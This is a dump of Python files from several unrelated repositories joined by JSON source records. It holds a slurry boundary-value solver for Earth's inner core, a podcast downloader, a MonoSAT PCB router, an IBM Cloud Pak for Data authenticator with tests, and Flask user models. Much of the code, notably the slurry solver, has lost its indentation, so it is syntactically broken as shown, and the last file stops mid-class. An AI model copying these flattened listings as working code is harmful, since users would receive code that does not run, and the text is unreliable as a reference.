ax3.set_xlim([1200,profiles.r.iloc[-1]*1e-3])
ax3.set_ylim([10.25,10.4])
major_xticks = np.arange(1200,1370,20)
minor_xticks = np.arange(1200,1370,5)
ax1.set_xticks(major_xticks)
ax1.set_xticks(minor_xticks, minor=True)
ax2.set_xticks(major_xticks)
ax2.set_xticks(minor_xticks, minor=True)
ax3.set_xticks(major_xticks)
ax3.set_xticks(minor_xticks, minor=True)
major_yticks = np.arange(5500,5751,100)
minor_yticks = np.arange(5500,5751,20)
ax1.set_yticks(major_yticks)
ax1.set_yticks(minor_yticks, minor=True)
ax1.grid(which='minor', alpha=0.2)
ax1.grid(which='major', alpha=0.5)
ax1.tick_params(which='major',length = 7)
ax1.tick_params(which='minor',length = 3.5)
# major_yticks = np.arange(6.5,8.1,0.5)
# minor_yticks = np.arange(6.5,8.1,0.1)
# ax2.set_yticks(major_yticks)
# ax2.set_yticks(minor_yticks, minor=True)
# ax2.grid(which='minor', alpha=0.2)
# ax2.grid(which='major', alpha=0.5)
# ax2.tick_params(which='major',length = 7)
# ax2.tick_params(which='minor',length = 3.5)
major_yticks = np.arange(10.25,10.4,0.05)
minor_yticks = np.arange(10.25,10.4,0.01)
ax3.set_yticks(major_yticks)
ax3.set_yticks(minor_yticks, minor=True)
ax3.grid(which='minor', alpha=0.2)
ax3.grid(which='major', alpha=0.5)
ax3.tick_params(which='major',length = 7)
ax3.tick_params(which='minor',length = 3.5)
if saveOn==1:
saveDir='figures/seismic/'
if not os.path.exists(saveDir+foldername):
os.makedirs(saveDir+foldername)
fig.savefig(saveDir+foldername+"/"+filename+"_CD.pdf",format='pdf', dpi=200, bbox_inches='tight')
fig.savefig(saveDir+foldername+"/"+filename+"_CD.png",format='png', dpi=200, bbox_inches='tight')
print('Figure saved as {}'.format(saveDir+foldername+"/"+filename+"_CD.pdf"))
plt.show()
return profiles.r, vp_slurry, profiles.density, vp_fvw
```
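A quick sketch of how `plot_CD` might be driven from a script. The parameter values below are illustrative only (they are not taken from this repository), and the call assumes the matching `results/<foldername>/<filename>/` directory produced by the slurry solver already exists:

```python
# Hypothetical driver for plot_CD; values are assumptions, not repository defaults.
import numpy as np

plot_CD(layer_thickness=np.array([150e3]),       # one layer thickness (m)
        thermal_conductivity=np.array([100.0]),  # W/m/K
        icb_heatflux=np.array([2.5]),            # TW (converted to W inside the solver)
        csb_heatflux=np.array([5.0]),            # TW
        saveOn=0)                                # 0 = do not save the figure
```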
#### File: nondim-slurry/slurpy/slurry.py
```python
import numpy as np
import os
import pandas as pd
import slurpy.getparameters as gp
# import slurpy.coreproperties as cp
import slurpy.lookup as lp
import slurpy.data_utils as sp
from scipy.integrate import solve_bvp
from slurpy.coreproperties import icb_radius, deltaV_solidFe_liquidFe, \
density_solidFe, heat_capacity, latent_heat, year
def solveslurry(layer_thickness, icb_heatflux, csb_heatflux, thermal_conductivity, \
csb_temp, h, mol_conc_oxygen_bulk=8, sedimentation_constant=1e-2,
self_diffusion=0.98e-8, mol_conc_SSi=8, model = 'prem', \
initial_F=5, initial_icAge=0.5, maxSt=6, n=100,
tolerance=1e-3,nmax=2e4):
# %% Nested functions to define BVP
def fun(r,y,p):
# Eigenvalues
F=p[0]
speed=p[1]
# PREM gravity and density in layer
if model =='prem':
density_seis=lp.premdensity(r*csb_radius)/density0 # dimensionless density
elif model == 'ohtaki':
            _,density_seis = lp.ohtaki(r*csb_radius)
            density_seis = density_seis/density0 # dimensionless density
gravity_seis=lp.premgravity(r*csb_radius)/csb_gravity # dimensionless gravity
density_grad_seis=np.gradient(density_seis,r)
gravity_grad_seis=np.gradient(gravity_seis,r)
# r derivative of barodiffusion term
term=gravity_seis*density_seis*np.exp(F*(csb_radius*r-icb_radius)/layer_thickness)* \
(F*csb_radius/layer_thickness+2/r-y[3]/y[0]+ \
gravity_grad_seis/gravity_seis+density_grad_seis/density_seis)/y[0]
# liquidus (=dxi/dr)
eq1=-(Lip*density_seis*gravity_seis+y[3]/y[0])*Rrho/(Lix*St*y[0])
# oxygen eqn (=dj/dr)
eq2=(Lip*Rrho*term/(Lix*St*Pe*Rvol) - eq1*(Rrho*speed+y[2]) - \
2*y[1]*y[2]/r)/y[1]
# temp eqn (=d2T/dr2)
eq3=-Pe/Le*((eq2+2/r*y[2])/St + \
(speed+2*Le/(r*Pe))*y[3])
return np.vstack([y[3],eq1,eq2,eq3])
def bcs(ya,yb,p):
speed = p[1]
return np.array([
yb[0]-csb_temp*heat_capacity*Rrho/(St*latent_heat), # CSB temp
yb[1]-1, # CSB xi
ya[2]+speed, # ICB solid flux
yb[2], # CSB solid flux
ya[3]+Pe/(St*Le), # ICB heat flux
yb[3]+Pe/Le # CSB heat flux
])
def ics(y):
        y[0,:]=csb_temp*heat_capacity*Rrho/(St*latent_heat) # temperature
        y[1,:]=1 # oxygen
        y[2,:]=-initial_speed # solid flux
        y[3,:]=-Pe/Le # temp gradient
return y
# Define initial conditions using previous solution
def ic_old(y):
y[0,:]=np.reshape(temp0,(1,n)) # temperature
y[1,:]=np.reshape(xi0,(1,n)) # oxygen
y[2,:]=np.reshape(solid_flux0,(1,n)) # solid flux
y[3,:]=np.reshape(temp_grad0,(1,n)) # temp gradient
return y
# %% DIMENSIONLESS NUMBERS
csb_radius=gp.getcsbradius(layer_thickness)
mass_conc_O,acore=gp.getcsbmassoxygen(mol_conc_oxygen_bulk)
init_snow_speed=gp.getsnowspeed(initial_icAge) # initial guess
freezing_speed=gp.getfreezingspeed(icb_heatflux)
initial_speed = (init_snow_speed + freezing_speed)/freezing_speed # dimensionless
Lip,csb_gravity,density0=gp.getLip(csb_radius,model)
Lix=gp.getLix(mass_conc_O)
St=gp.getStefan(icb_heatflux,csb_heatflux,csb_radius)
deltaV_liquidFeO_solidFe=gp.getchangevolmelting(mol_conc_oxygen_bulk,density0)
Le=gp.getLewis(thermal_conductivity,self_diffusion,density0)
Pe=gp.getPeclet(freezing_speed,csb_radius,self_diffusion)
Rrho=density0/density_solidFe
Rvol = deltaV_solidFe_liquidFe/deltaV_liquidFeO_solidFe
scale_temp = gp.get_tempScale(csb_heatflux,csb_radius,density0,freezing_speed)
scale_xi = mass_conc_O
scale_j = gp.get_jScale(freezing_speed)
# %% OUTPUT DIRECTORY
str1=str(np.round(Le,2)).replace('.','_')
str2=str(np.round(Lip,2)).replace('.','_')
str3=str(np.round(Lix,2)).replace('.','_')
str4=str(np.round(Pe,2)).replace('.','_')
str5=str(np.round(St,2)).replace('.','_')
if model == 'ohtaki':
outputDir="ohtaki/Le_{}/Lip_{}_Lix_{}_Pe_{}_St_{}/".format(str1,str2,str3,str4,str5)
else:
outputDir="results/Le_{}/Lip_{}_Lix_{}_Pe_{}_St_{}/".format(str1,str2,str3,str4,str5)
# Make directory if it doesn't exist
if not os.path.exists(outputDir):
os.makedirs(outputDir)
# Ignore cases where csb heat flux is smaller than icb heat flux
elif csb_heatflux < icb_heatflux:
return (outputDir,0,0,0,0,0)
# Impose upper limit on St
elif St> maxSt:
return (outputDir,0,0,0,0,0)
# Skip if directory already exists
# else:
# return (outputDir,0,0,0,0,0)
# Load previous solution to initialise
# Previous Stefan number
m=1
state=2
initOn=0
# FIX: loop back through all of St before Pe
while state == 2:
try:
csb_heatflux_old=csb_heatflux-m*h
St_old=gp.getStefan(icb_heatflux,csb_heatflux_old,csb_radius)
str5=str(np.round(St_old,2)).replace('.','_')
inputDir="results/Le_{}/Lip_{}_Lix_{}_Pe_{}_St_{}/".format(str1,str2,str3,str4,str5)
data_output=pd.read_csv(inputDir+"outputs.csv",index_col=False)
state = np.float(data_output['state'])
m=m+1
initOn=1
except FileNotFoundError:
# Previous Peclet number
m=1
state=2
while state == 2:
try:
icb_heatflux_old = icb_heatflux-m*h
freezing_speed_old=gp.getfreezingspeed(icb_heatflux_old)
Pe_old=gp.getPeclet(freezing_speed_old,csb_radius,self_diffusion)
St_old=gp.getStefan(icb_heatflux_old,csb_heatflux,csb_radius)
str4=str(np.round(Pe_old,2)).replace('.','_')
str5=str(np.round(St_old,2)).replace('.','_')
inputDir="results/Le_{}/Lip_{}_Lix_{}_Pe_{}_St_{}/".format(str1,str2,str3,str4,str5)
data_output=pd.read_csv(inputDir+"outputs.csv",index_col=False)
state = np.float(data_output['state'])
m=m+1
initOn=2
except FileNotFoundError:
initOn=0
break
break
# Read csv data
if initOn!=0:
data_profile=pd.read_csv(inputDir+"profiles.csv",index_col=False)
temp0=np.array(data_profile['temp'])
xi0=np.array(data_profile['oxygen'])
solid_flux0=np.array(data_profile['solidflux'])
temp_grad0=np.array(data_profile['temp_grad'])
initial_F=np.float(data_output['F'])
snow_speed=np.float(data_output['snowSpeed'])
initial_speed=np.float(data_output['icbSpeed'])
freezing_speed_old=initial_speed-snow_speed
n=temp0.size
# Non-dimensionalise initial guess
scale_tempOld = gp.get_tempScale(csb_heatflux_old,csb_radius,density0,
freezing_speed)
scale_jOld=gp.get_jScale(freezing_speed_old)
temp0=temp0/scale_tempOld
xi0=xi0/scale_xi
solid_flux0=solid_flux0/scale_jOld
temp_grad0=temp_grad0/scale_tempOld*csb_radius
# %% MESH
r=np.linspace(icb_radius/csb_radius,1,n)
y=np.zeros((4,r.size)) # pre-allocate soln array
# %% BOUNDARY VALUE PROBLEM
# Run solver - default solver tolerance is 1e-3, default max nodes is 1000
if initOn!=0:
print('Initialised with {}'.format(inputDir))
sol=solve_bvp(fun,bcs,r,ic_old(y),p=[initial_F,initial_speed],tol=tolerance,verbose=2,max_nodes=nmax)
elif initOn==0:
print('No initialisation')
sol=solve_bvp(fun,bcs,r,ics(y),p=[initial_F,initial_speed],tol=tolerance,verbose=2,max_nodes=nmax)
# If initialisation gives no soln then try no initialisation
if initOn!=0 and sol.status!=0:
print('Status = {} - Try again without initialisation'.format(sol.status))
sol=solve_bvp(fun,bcs,r,ics(y),p=[initial_F,initial_speed],tol=tolerance,verbose=2,max_nodes = nmax)
if sol.status==2:
state=2
print("Singular Jacobian encountered")
elif sol.status==1:
state=1
print("Maximum number of mesh nodes exceeded")
else:
state=0
print("Converged")
# %% OUTPUT
F_out=sol.p[0]
icb_speed_out=sol.p[1]*freezing_speed
snow_speed_out = icb_speed_out - freezing_speed
ic_age_out=gp.geticage(icb_speed_out)
print("Mixing parameter is %.2f" % F_out)
print("Freezing speed is {:.2e} m/s = {:.3f} mm/yr".format(freezing_speed,freezing_speed*1e3*year))
print("ICB speed is {:.2e} m/s = {:.3f} mm/yr".format(icb_speed_out,icb_speed_out*1e3*year))
print("IC age is %.2f Ga" % ic_age_out)
# Nondimensional to dimensional
r_out = sol.x*csb_radius
temp_out = sol.y[0,:]*scale_temp
xi_out= sol.y[1,:]*scale_xi
j_out= sol.y[2,:]*scale_j
j_out[-1]=0. # BVP minimises j to be close to, but not exactly zero at the CSB
temp_grad_out= sol.yp[0,:]*scale_temp/csb_radius
xi_grad_out= sol.yp[1,:]*scale_xi/csb_radius
j_grad_out=sol.yp[2,:]*scale_j/csb_radius
# %% POST-PROCESS
# Slurry density
density,phi_out,temp_denFluc,xi_denFluc,phi_denFluc,density_fluc= \
gp.slurrydensity(r_out,temp_out,xi_out,j_out, \
mol_conc_oxygen_bulk,sedimentation_constant,model=model)
density_jump=density[0]-density[-1]
print("Density jump is {:.2f} kg/m^-3".format(density_jump))
# Stable layer?
density_fluc_grad = np.gradient(density_fluc,r_out)
unstable = density_fluc_grad[density_fluc_grad>0]
if unstable.size!=0:
print('Unstable slurry')
else:
print('Stable slurry')
# Heat balance
(Q_cmb, Qs, Qs_slurry, Qs_oc, Ql, Qg, Qg_oc, Qg_slurry, cooling_rate_out,
cmb_temp, temp_ad) = gp.heatflux(r_out,temp_out,xi_out,j_out,phi_out, \
temp_grad_out,xi_grad_out, density, \
icb_speed_out,icb_heatflux*1e12,
layer_thickness,thermal_conductivity,csb_heatflux*1e12,n)
# %% SAVE
sp.saveprofiles(outputDir,r_out,temp_out,xi_out,j_out,phi_out,density, \
temp_grad_out,xi_grad_out,j_grad_out,temp_denFluc,xi_denFluc, \
phi_denFluc,density_fluc)
sp.saveinputs(outputDir,n,layer_thickness,thermal_conductivity,icb_heatflux, \
csb_heatflux, mol_conc_oxygen_bulk,mol_conc_SSi, \
self_diffusion,sedimentation_constant)
sp.saveoutputs(outputDir,F_out,snow_speed_out,icb_speed_out,Q_cmb, Qs, Qs_slurry, \
Qs_oc, Ql, Qg, Qg_oc, Qg_slurry, cooling_rate_out, \
cmb_temp,acore,state)
print('Run {} is saved'.format(outputDir))
return (outputDir, r_out, temp_out, xi_out, j_out, F_out, icb_speed_out, density)
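# Usage sketch (hypothetical values, chosen only to illustrate the calling
# convention; heat fluxes are in TW, layer thickness in m, and h is the heat-flux
# step used when searching for a previous solution to initialise from):
#   out_dir, r, temp, xi, j, F, icb_speed, density = solveslurry(
#       layer_thickness=150e3, icb_heatflux=2.5, csb_heatflux=5.0,
#       thermal_conductivity=100., csb_temp=5500., h=0.5)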
``` |
{
"source": "jo1gi/podcast-dl",
"score": 2
} |
#### File: podcast-dl/podcastdl/main.py
```python
from . import arguments, search, download
def run():
try:
options = arguments.parse_args()
        if options.search is not None:
search_results = search.search(options.search)
if search_results == None:
print("Could not find any podcasts")
exit()
search.print_results(search_results)
        if options.url is not None:
download.download(
options.url,
limit=options.limit,
oldest=not options.newest,
                full_title=options.full_title,
overwrite=options.overwrite,
)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
run()
```
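For reference, a minimal sketch of using the two helpers that `run()` wires together, outside of the CLI. The search term and feed URL are placeholders, and the keyword arguments simply mirror what `run()` passes:

```python
# Hypothetical direct use of podcastdl's search/download helpers.
from podcastdl import search, download

results = search.search("history")           # search term is a placeholder
if results is not None:
    search.print_results(results)

download.download(
    "https://example.com/feed.xml",           # placeholder feed URL
    limit=5,
    oldest=False,
    full_title=False,
    overwrite=False,
)
```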
#### File: podcast-dl/podcastdl/networking.py
```python
import requests, json
def get(url, status_code=None, **kwargs):
"""Downloads data from the given url"""
try:
resp = requests.get(url, **kwargs)
        if status_code is not None:
            if resp.status_code != status_code:
                return None
return resp.content
except Exception as e:
return None
def get_json(url, **kwargs):
"""Downloads json data and converts it to a dict"""
raw = get(url, **kwargs)
    if raw is None:
return None
return json.loads(raw.decode('utf8'))
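# Usage sketch (URL is a placeholder):
#   data = get_json("https://example.com/api.json")
#   if data is not None:
#       print(data.get("title"))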
``` |
{
"source": "jo285317/monosat",
"score": 2
} |
#### File: examples/routing/router.py
```python
from monosat import *
from time import time
import pcrt
import itertools
#There are many ways to perform circuit routing using MonoSAT.
#The approach here uses just one graph, combining MonoSAT's built-in reachability constraints (to ensure each
#net is routed) with propositional constraints over the edges in the graph (to prevent nets from intersecting).
#This function also supports a slightly more complex router, which combines reachability and maximum flow constraints.
#The maximum flow constraint is not powerful enough on its own to ensure correct routing, but it is a (safe)
#over-approximation that allows the solver to prune large parts of the search space early.
#
#The variation described here supports only 2-terminal routing; use router_multi.py for multi-terminal routing.
#Finally, for the special case of Escape Routing (in which the destinations are interchangeable), see
#
#Bayless, Sam, <NAME>, and <NAME>. "Scalable, high-quality, SAT-based multi-layer escape routing."
#Computer-Aided Design (ICCAD), 2016 IEEE/ACM International Conference on. IEEE, 2016.
def route(filename, monosat_args,use_maxflow=False, draw_solution=True, outputFile = None):
(width, height),diagonals,nets,constraints,disabled = pcrt.read(filename)
print(filename)
print("Width = %d, Height = %d, %d nets, %d constraints, %d disabled"%(width,height,len(nets),len(constraints), len(disabled)))
if diagonals:
print("45-degree routing")
else:
print("90-degree routing")
for net in nets:
if(len(net)!=2):
raise Exception("router.py only supports routing nets with exactly 2 vertices. Use router_multi.py for routing nets with 2+ vertices.")
if(len(monosat_args)>0):
args = " ".join(monosat_args)
print("MonoSAT args: " + args)
Monosat().newSolver(args)
if outputFile is not None:
print("Writing output to " + outputFile)
Monosat().setOutputFile(outputFile)
g = Graph()
print("Building grid")
edges = dict()
grid = dict()
for x in range(width):
for y in range(height):
n = g.addNode("%d_%d"%(x,y))
grid[(x,y)] = n
edges[(x,y)]=[]
disabled_nodes = set(disabled)
undirected_edges = dict()
#create undirected edges between neighbouring nodes
if draw_solution:
#the dicts here are only used to print the solution at the end. Disable for benchmarking.
lefts = dict()
rights = dict()
ups = dict()
downs = dict()
down_lefts = dict()
up_rights = dict()
down_rights = dict()
up_lefts = dict()
start_nodes = set()
end_nodes = set()
net_nodes = set()
for net in nets:
assert(len(net)==2)
start_nodes.add(net[0])
end_nodes.add(net[1])
for (x,y) in net:
net_nodes.add((x,y))
#create undirected edges between neighbouring nodes
def makeEdge(n,r):
e = None
if n not in disabled_nodes and r not in disabled_nodes:
if n in net_nodes or r in net_nodes:
#only add directed edges for start/end nodes.
allow_out=True
allow_in = True
if n in start_nodes or r in end_nodes:
allow_in=False
if n in end_nodes or r in start_nodes:
allow_out = False
assert(not (allow_in and allow_out))
if allow_out:
e = g.addEdge(grid[n], grid[r]) #add a _directed_ edge from n to r
undirected_edges[e]=e
elif allow_in:
e = g.addEdge(grid[r], grid[n]) # add a _directed_ edge from r to n
undirected_edges[e]=e
else:
e=None
else:
#add undirected edges for other nodes in the grid
e = g.addEdge(grid[n],grid[r]) #in monosat, undirected edges are specified by creating
undirected_edges[e]=e
e2 = g.addEdge(grid[r],grid[n]) #directed edges in both directions, and making them equal
undirected_edges[e2]=e
AssertEq(e,e2)
if e is not None:
edges[n].append(e)
edges[r].append(e)
return e
for x in range(width):
for y in range(height):
n = (x,y)
if n in disabled_nodes:
continue
if x<width-1:
r = (x+1,y)
e = makeEdge(n,r)
if e is not None and draw_solution:
rights[n] = e
lefts[r] = e
if y<height-1:
r = (x,y+1)
e = makeEdge(n,r)
if e is not None and draw_solution:
downs[n] = e
ups[r] = e
if diagonals:
#if 45 degree routing is enabled
diag_up=None
diag_down=None
if x<width-1 and y<height-1:
r = (x+1,y+1)
e = makeEdge(n,r)
diag_down = e
if e is not None and draw_solution:
down_rights[n] = e
up_lefts[r] = e
if x>0 and y<height-1 and False:
r = (x-1,y+1)
e = makeEdge(n,r)
diag_up = e
if e is not None and draw_solution:
down_lefts[n] = e
up_rights[r] = e
if diag_up and diag_down:
AssertNand(diag_up, diag_down) #cannot route both diagonals
if len(constraints)>0:
print("Enforcing constraints")
vertex_used = dict()
for x in range(width):
for y in range(height):
vertex_used[(x, y)] = Or(edges[(x, y)]) # A vertex is used exactly if one of its edges is enabled
for constraint in constraints:
if len(constraint)>1:
#a constraint is a list of vertices of which at most one can be used
vertex_used_list = []
for node in constraint:
vertex_used_list.append(vertex_used[node])
if(len(vertex_used_list)<20):
for a,b in itertools.combinations(vertex_used_list, 2):
AssertOr(~a,~b) #in every distinct pair of edges, at least one must be false
else:
AssertAtMostOne(vertex_used_list) #use more expensive, but more scalable, built-in AMO theory
print("Enforcing net separation")
#enforce that at any node that is not a starting/ending node, either exactly 2, or exactly no, edges are enabled
#this approach ensures acyclicity, and also ensures that nodes from one net do not reach any other net.
#However, this approach cannot be used to route trees.
for x in range(width):
for y in range(height):
n = (x,y)
edge_list = edges[n]
if n in net_nodes:
#n is a start or end node in the net.
#no constraint is required, as only directed edges are available at start/end nodes
pass
else:
#n is not a start or end node; either exactly 2, or exactly 0, adjacent edges must be enabled
#There are many ways to actually enforce that constraint, not clear what the best option is
#This is slightly complicated by edge nodes/corner nodes having fewer neighbours.
if len(edge_list)>2:
AssertNand(edge_list) #At least one edge must be disabled
if len(edge_list)>=4:
#All but two edges must be disabled.
#This uses up to ~28 constraints. It might be better to implement this using PB constraints instead.
disabled_two = false()
for pair in itertools.combinations(edge_list, len(edge_list)-2):
disabled_two = Or(disabled_two, Nor(pair))
Assert(disabled_two)
print("Enforcing net routing")
#enforce reachability using MonoSAT's builtin reachability constraints
#notice that unreachability between different nets does not need to be explicitly enforced here, because of the
#edge constraints above.
reach_constraints = []
for net in nets:
assert(len(net)==2)
n1 = net[0]
n2 = net[1]
r = g.reaches(grid[n1],grid[n2])
reach_constraints.append(r)
Assert(r)
r.setDecisionPriority(1); #decide reachability before considering regular variable decisions
#optional: use a maximum flow constraint, as an overapprox of disjoint reachability.
if use_maxflow:
print("Enforcing maxflow constraint")
#add a source and dest node, with 1 capacity from source to each net start vertex, and 1 capacity from each net end vertex to dest
source = g.addNode()
dest = g.addNode()
for net in nets:
Assert(g.addEdge(source,grid[net[0]],1)) #directed edges!
Assert(g.addEdge(grid[net[1]],dest, 1)) #directed edges!
m = g.maxFlowGreaterOrEqualTo(source,dest,len(nets))
Assert(m)
m.setDecisionPriority(-1); # never make decisions on the maxflow predicate.
if outputFile is not None:
print("Wrote constraints to " + outputFile + ", exiting without solving")
sys.exit(0)
print("Solving...")
if Solve():
print("Solved!")
if draw_solution:
paths = set() #collect all the edges that make up the routing
for r in reach_constraints:
path = g.getPath(r,True)
for e in path:
assert(e.value())
if e in undirected_edges.keys():
e = undirected_edges[e] #normalize the edge var
paths.add(e)
#print the solution to the console
for y in range(height):
for x in range(width):
n = (x,y)
if (x,y) in net_nodes:
print("*",end="")
else:
print(" ",end="")
if x<width-1:
r = (x+1,y)
if n in rights:
e = rights[n]
if e in paths:
print("-",end="")
else:
print(" ",end="")
else:
print(" ", end="")
print()
for x in range(width):
n = (x, y)
if y<height-1:
r = (x,y+1)
if n in downs:
e = downs[n]
if e in paths:
print("|",end="")
else:
print(" ",end="")
else:
print(" ", end="")
drew_diag=False
if diagonals:
if y<height-1 and x<width-1:
r = (x+1,y+1)
if n in down_rights:
e = down_rights[n]
if e in paths:
print("\\",end="")
drew_diag=True
if y>0 and x<width-1:
n = (x, y+1)
r = (x+1,y)
if n in up_rights:
e = up_rights[n]
if e in paths:
print("/",end="")
assert(not drew_diag)
drew_diag=True
if not drew_diag:
print(" ", end="")
print()
print("s SATISFIABLE")
sys.exit(10)
else:
print("s UNSATISFIABLE")
sys.exit(20)
if __name__ == '__main__':
import sys
monosat_args = ['-ruc'] #default argument for MonoSAT; enables the heuristics described in "Routing Under Constraints", FMCAD 2016, <NAME>
if len(sys.argv)<2:
print("Usage: router.py [monosat arguments] filename.pcrt")
sys.exit(1)
use_maxflow=False
for i,arg in enumerate(sys.argv):
if sys.argv[i].startswith("--use-maxflow"):
use_maxflow = True
del(sys.argv[i])
break
outputFile = None
for i,arg in enumerate(sys.argv):
if sys.argv[i].startswith("--output"):
outputFile = sys.argv[i+1]
del(sys.argv[i])
del(sys.argv[i])
break
if len(sys.argv) > 2:
monosat_args = sys.argv[1:-1]
route(sys.argv[-1], monosat_args,use_maxflow,True, outputFile)
``` |
{
"source": "jo2hu6/home-assistant",
"score": 2
} |
#### File: ibm_cloud_sdk_core/authenticators/cp4d_authenticator.py
```python
from .authenticator import Authenticator
from ..cp4d_token_manager import CP4DTokenManager
from ..utils import has_bad_first_or_last_char
class CloudPakForDataAuthenticator(Authenticator):
authentication_type = 'cp4d'
def __init__(self,
username,
password,
url,
disable_ssl_verification=False,
headers=None,
proxies=None):
"""
:attr str username: The username
:attr str password: The password
:attr str url: The url for authentication
        :attr bool disable_ssl_verification: enables/disables ssl verification
:attr dict headers: user-defined headers
:attr dict proxies: user-defined proxies
"""
self.token_manager = CP4DTokenManager(
username, password, url, disable_ssl_verification, headers, proxies)
self.validate()
def validate(self):
"""
Performs validation on input params
"""
if self.token_manager.username is None or self.token_manager.password is None:
raise ValueError('The username and password shouldn\'t be None.')
if self.token_manager.url is None:
raise ValueError('The url shouldn\'t be None.')
if has_bad_first_or_last_char(
self.token_manager.username) or has_bad_first_or_last_char(self.token_manager.password):
raise ValueError(
'The username and password shouldn\'t start or end with curly brackets or quotes. '
'Please remove any surrounding {, }, or \" characters.')
if has_bad_first_or_last_char(self.token_manager.url):
raise ValueError(
'The url shouldn\'t start or end with curly brackets or quotes. '
'Please remove any surrounding {, }, or \" characters.')
def authenticate(self, req):
"""
Adds the Authorization header, if applicable
"""
headers = req.get('headers')
bearer_token = self.token_manager.get_token()
headers['Authorization'] = 'Bearer {0}'.format(bearer_token)
def set_disable_ssl_verification(self, status=False):
"""
Sets the ssl verification to enabled or disabled
"""
self.token_manager.set_disable_ssl_verification(status)
def set_headers(self, headers):
"""
Sets user-defined headers
"""
self.token_manager.set_headers(headers)
def set_proxies(self, proxies):
"""
Sets the proxies
"""
self.token_manager.set_proxies(proxies)
```
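A minimal usage sketch, assuming a reachable Cloud Pak for Data endpoint (the URL and credentials below are placeholders). `authenticate` fetches a bearer token via the token manager and injects it into the request's headers, exactly as exercised by the test below:

```python
from ibm_cloud_sdk_core.authenticators import CloudPakForDataAuthenticator

# Placeholders only; a real deployment URL and credentials are required.
authenticator = CloudPakForDataAuthenticator(
    'my_username', 'my_password', 'https://cp4d.example.com')

request = {'headers': {}}
authenticator.authenticate(request)  # sets request['headers']['Authorization'] = 'Bearer <token>'
```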
#### File: site-packages/test/test_cp4d_authenticator.py
```python
import pytest
import responses
import time
import jwt
import json
from ibm_cloud_sdk_core.authenticators import CloudPakForDataAuthenticator
def test_iam_authenticator():
authenticator = CloudPakForDataAuthenticator(
'my_username', 'my_password', 'http://my_url')
assert authenticator is not None
assert authenticator.token_manager.url == 'http://my_url/v1/preauth/validateAuth'
assert authenticator.token_manager.username == 'my_username'
assert authenticator.token_manager.password == '<PASSWORD>'
assert authenticator.token_manager.disable_ssl_verification is False
assert authenticator.token_manager.headers is None
assert authenticator.token_manager.proxies is None
authenticator.set_disable_ssl_verification(True)
assert authenticator.token_manager.disable_ssl_verification is True
with pytest.raises(TypeError) as err:
authenticator.set_headers('dummy')
assert str(err.value) == 'headers must be a dictionary'
authenticator.set_headers({'dummy': 'headers'})
assert authenticator.token_manager.headers == {'dummy': 'headers'}
with pytest.raises(TypeError) as err:
authenticator.set_proxies('dummy')
assert str(err.value) == 'proxies must be a dictionary'
authenticator.set_proxies({'dummy': 'proxies'})
assert authenticator.token_manager.proxies == {'dummy': 'proxies'}
def test_iam_authenticator_validate_failed():
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator('my_username', None, 'my_url')
assert str(err.value) == 'The username and password shouldn\'t be None.'
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator(None, 'my_password', 'my_url')
assert str(err.value) == 'The username and password shouldn\'t be None.'
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator('my_username', 'my_password', None)
assert str(err.value) == 'The url shouldn\'t be None.'
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator('{my_username}', 'my_password', 'my_url')
assert str(err.value) == 'The username and password shouldn\'t start or end with curly brackets or quotes. Please remove any surrounding {, }, or \" characters.'
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator('my_username', '{my_password}', 'my_url')
assert str(err.value) == 'The username and password shouldn\'t start or end with curly brackets or quotes. Please remove any surrounding {, }, or \" characters.'
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator('my_username', 'my_password', '{my_url}')
assert str(err.value) == 'The url shouldn\'t start or end with curly brackets or quotes. Please remove any surrounding {, }, or \" characters.'
@responses.activate
def test_get_token():
url = "https://test"
access_token_layout = {
"username": "dummy",
"role": "Admin",
"permissions": [
"administrator",
"manage_catalog"
],
"sub": "admin",
"iss": "sss",
"aud": "sss",
"uid": "sss",
"iat": 1559324664,
"exp": 1559324664
}
access_token = jwt.encode(access_token_layout,
'secret', algorithm='HS256',
headers={'kid': '230498151c214b788dd97f22b85410a5'}).decode('utf-8')
response = {
"accessToken": access_token,
"token_type": "Bearer",
"expires_in": 3600,
"expiration": 1524167011,
"refresh_token": "<PASSWORD>"
}
responses.add(responses.GET, url + '/v1/preauth/validateAuth', body=json.dumps(response), status=200)
authenticator = CloudPakForDataAuthenticator(
'my_username', '<PASSWORD>', url)
request = {'headers': {}}
authenticator.authenticate(request)
assert request['headers']['Authorization'] is not None
``` |
{
"source": "jo2in/PythonFlaskTutorial",
"score": 2
} |
#### File: src/helloworld/models.py
```python
import jwt
from datetime import datetime, timedelta
from hashlib import md5
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from helloworld import app, db
from helloworld import login
@login.user_loader
def load_user(id):
return User.query.get(int(id))
subscriptions = db.Table('subscriptions',
db.Column('user_id', db.Integer, db.ForeignKey('user.id'), primary_key=True),
db.Column('course_id', db.Integer, db.ForeignKey('course.id'), primary_key=True)
)
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(128), index=True, unique=True)
password_hash = db.Column(db.String(128))
    last_seen = db.Column(db.DateTime, default=datetime.utcnow)
courses = db.relationship('Course', secondary=subscriptions,
backref=db.backref('course_participant', lazy=True), lazy='dynamic')
def get_reset_password_token(self, expires_in=600):
return jwt.encode(
            {'reset_password': self.id, 'exp': datetime.utcnow() + timedelta(seconds=expires_in)},
app.config['SECRET_KEY'], algorithm='HS256').decode('utf-8')
@staticmethod
def verify_reset_password_token(token):
try:
id = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])['reset_password']
        except jwt.PyJWTError as e:
app.logger.error('Decoding error: {}'.format(e))
return
return User.query.get(id)
def avatar(self, size=128):
digest = md5(self.email.lower().encode('utf-8')).hexdigest()
return 'https://www.gravatar.com/avatar/{}?d=identicon&s={}'.format(digest, size)
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def subscribe(self, course):
self.courses.append(course)
def unsubscribe(self, course):
self.courses.remove(course)
def __repr__(self):
return '<User {}>'.format(self.username)
class Course(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(140))
description = db.Column(db.String(140), index=True)
subscribers = db.relationship('User', secondary=subscriptions,
backref=db.backref('subscribed_courses', lazy=True), lazy='dynamic')
def __repr__(self):
